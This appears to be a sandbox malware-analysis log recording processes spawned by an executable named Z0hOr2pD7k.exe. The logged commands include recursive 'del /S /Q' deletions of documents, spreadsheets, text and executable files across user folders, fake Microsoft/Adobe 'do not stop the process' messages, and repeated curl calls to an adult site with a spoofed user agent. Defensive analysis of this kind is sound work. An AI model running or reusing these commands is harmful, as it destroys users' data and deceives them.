Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul | |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready... | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft Corporation | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe Corporation | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESS | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute... | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFF | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Cache\index | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\b769a4d951e2b603_0 | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Visited Links | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index | Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe | File opened: c:\users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db | Jump to behavior |
